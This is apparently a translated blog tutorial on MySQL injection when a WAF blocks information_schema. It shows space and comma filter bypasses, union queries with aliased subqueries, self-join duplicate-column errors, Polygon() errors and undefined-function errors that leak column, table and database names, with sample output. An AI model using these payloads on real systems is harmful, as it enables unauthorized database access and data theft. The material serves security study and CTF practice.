
Extracting column, table and database names via error messages

Posted: 2021-07-20 15:41:17

Using error messages to leak table names, column names and database names

Suppose an injection point exists, but the WAF blocks keywords and functions such as information_schema, columns, tables, database and schema. How can we obtain the current table name, column names and database name?

Column name

union + aliased subquery

Basic case (union available)

The challenge filters spaces and commas. Spaces can be bypassed with %0a, %0b, %0c, %0d, %a0, or simply by using parentheses; commas can be bypassed with join.

The name of the column holding the flag is unknown, and information_schema.columns is also filtered (including the hex-encoded table name), so the column name cannot be retrieved directly. In that case a union query can be used to make the unknown column's values appear under a column name we already know.

Example

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
| 1 | admin | admin888 | 110@110.com |
| 2 | test  | test123  | 119@119.com |
| 3 | cs    | cs123    | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4           |
+-------------+
| 4           |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
+-------------+
| 4           |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)

mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id          | username | password | email       |
+-------------+----------+----------+-------------+
| 1           | admin    | admin888 | 110@110.com |
| 120@120.com | 1        | 1        | 1           |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)

Advanced case (union unavailable)

select name from test where id=1 and (select * from (select * from test as a join test as b) as c);

This leaks the first column name.


Principle: when a derived table is given an alias, it may not contain two columns with the same name. Joining the table with itself duplicates every column, so the aliased derived table c raises a duplicate-column error that names the column.

Next, use using to leak the remaining columns:

select name from test where id=1 and (select * from (select * from test as a join test as b using(id)) as c);


This yields the next column:

select name from test where id=1 and (select * from (select * from test as a join test as b using(id,name)) as c);

Put every column name found so far into using to obtain the next one.

……

using is equivalent to on in a join. For example, if a and b are related on the id column, the following are equivalent:

using(id)
on a.id=b.id

The following two statements are equivalent:

select a.name,b.age from test as a join test2 as b on a.id=b.id
select a.name,b.age from test as a join test2 as b using(id)

Table name

Polygon(ls1, ls2, ...)

Polygon constructs a value from several LineString or WKB LineString arguments. If any argument does not represent a LinearRing (that is, it is not a closed and simple LineString), the return value is NULL.

If the argument is not a LineString, an error is raised; and if what we pass in is an existing column, the error message reveals the database, table and column names.


Database name

select * from users where uid =1-a();


Principle: a database contains various built-in and user-defined functions; if the function does not exist, the error reports that this database has no such function, and the message includes the database name.


Original: https://www.cnblogs.com/vv3b/p/15034071.html
